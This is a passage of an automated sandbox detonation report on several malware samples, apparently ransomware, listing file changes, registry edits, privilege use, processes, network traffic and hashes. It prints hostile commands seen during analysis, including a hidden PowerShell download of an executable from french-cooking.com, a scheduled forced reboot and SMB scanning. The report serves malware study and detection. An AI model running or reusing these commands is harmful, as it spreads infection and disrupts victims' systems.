| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REPLTMPL.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REPORT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OMSSMS.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POST.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESN.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\DataSet.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\TextFile.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\APPT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfig.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Text.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\amd64\jvm.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.PPT | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFRES.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DOC.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\Words.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REC.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKDEC.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\SyncClear.docx | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Visualizer.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrome.7z | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OSPP.VBS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\DebugPing.vbs | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\dllhost.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E4F2.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E4F2.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E4F2.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E4F2.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E4F2.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\E4F2.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:35
C:\Users\Admin\AppData\Local\Temp\E4F2.tmp
"C:\Users\Admin\AppData\Local\Temp\E4F2.tmp" \\.\pipe\{05AF6699-F0DE-49E6-9A76-C4348E70F621}
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:35
Network
| Country | Destination | Domain | Proto |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.0.0:139 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.2:139 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.3:139 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.4:139 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.5:139 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.6:139 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.7:139 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.8:139 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.9:139 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.10:139 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.11:139 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.12:139 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.13:139 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.14:139 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.15:139 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.16:139 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.17:139 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.18:139 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.19:139 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.20:139 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.21:139 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.22:139 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.23:139 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.24:139 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.25:139 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.26:139 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.27:139 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.28:139 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.29:139 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.30:139 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.31:139 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.32:139 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.33:139 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.34:139 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.35:139 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.36:139 | tcp | |
| N/A | 10.127.0.37:445 | tcp |
Files
memory/1732-0-0x0000000000140000-0x000000000019E000-memory.dmp
memory/1732-8-0x0000000000140000-0x000000000019E000-memory.dmp
memory/1732-9-0x0000000000140000-0x000000000019E000-memory.dmp
\Users\Admin\AppData\Local\Temp\E4F2.tmp
| MD5 | 7e37ab34ecdcc3e77e24522ddfd4852d |
| SHA1 | 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf |
| SHA256 | 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f |
| SHA512 | 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587 |
memory/1732-24-0x0000000000140000-0x000000000019E000-memory.dmp
memory/1732-11-0x0000000000140000-0x000000000019E000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win7-20241010-en
Max time kernel
120s
Max time network
126s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\clvkjuet = "C:\\Users\\Admin\\Nbbzwmhrr\\oqjajuet.exe" | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2268 set thread context of 2872 | N/A | C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe | C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe |
| PID 2880 set thread context of 2876 | N/A | C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre | C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"
C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"
C:\Windows\SysWOW64\svchost.exe
svchost.exe
C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre
C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre
C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre
C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre
C:\Windows\SysWOW64\svchost.exe
svchost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | nvufvwieg.com | udp |
Files
memory/2872-8-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2872-6-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2872-4-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2872-2-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2872-1-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2872-10-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2872-13-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2872-11-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2872-12-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2872-16-0x0000000000400000-0x0000000000414000-memory.dmp
memory/3024-15-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
memory/3024-14-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
memory/3024-18-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre
| MD5 | 1b2d2a4b97c7c2727d571bbf9376f54f |
| SHA1 | 1fc29938ec5c209ba900247d2919069b320d33b0 |
| SHA256 | 7634433f8fcf4d13fb46d680802e48eeb160e0f51e228cae058436845976381e |
| SHA512 | 506fc96423e5e2e38078806591e09a6eb3cf924eb748af528f7315aa0b929890823798a3ef2a5809c14023c3ff8a3db36277bc90c7b099218422aafa4e0c2ee0 |
memory/3024-27-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
memory/2876-45-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2120-47-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
memory/2120-51-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
memory/2120-56-0x000000007EFA0000-0x000000007EFAE000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
147s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test2.py
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
139s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\warna.py
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.209.201.84.in-addr.arpa | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win10v2004-20241007-en
Max time kernel
96s
Max time network
139s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\mshta.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4720 wrote to memory of 1528 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4720 wrote to memory of 1528 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4720 wrote to memory of 1528 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\myguy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4720 -ip 4720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 1420
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\33005.exe');
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | french-cooking.com | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| FR | 54.36.91.62:80 | french-cooking.com | tcp |
| US | 8.8.8.8:53 | 62.91.36.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
memory/1528-0-0x0000000070C9E000-0x0000000070C9F000-memory.dmp
memory/1528-1-0x0000000002BA0000-0x0000000002BD6000-memory.dmp
memory/1528-3-0x0000000070C90000-0x0000000071440000-memory.dmp
memory/1528-4-0x0000000070C90000-0x0000000071440000-memory.dmp
memory/1528-2-0x0000000005440000-0x0000000005A68000-memory.dmp
memory/1528-5-0x00000000053D0000-0x00000000053F2000-memory.dmp
memory/1528-6-0x0000000005AE0000-0x0000000005B46000-memory.dmp
memory/1528-7-0x0000000005B50000-0x0000000005BB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3htifwxr.z25.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1528-17-0x0000000005BC0000-0x0000000005F14000-memory.dmp
memory/1528-18-0x00000000061E0000-0x00000000061FE000-memory.dmp
memory/1528-19-0x0000000006290000-0x00000000062DC000-memory.dmp
memory/1528-20-0x0000000007830000-0x0000000007EAA000-memory.dmp
memory/1528-21-0x0000000006710000-0x000000000672A000-memory.dmp
memory/1528-24-0x0000000070C90000-0x0000000071440000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win7-20241010-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepad.lnk | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
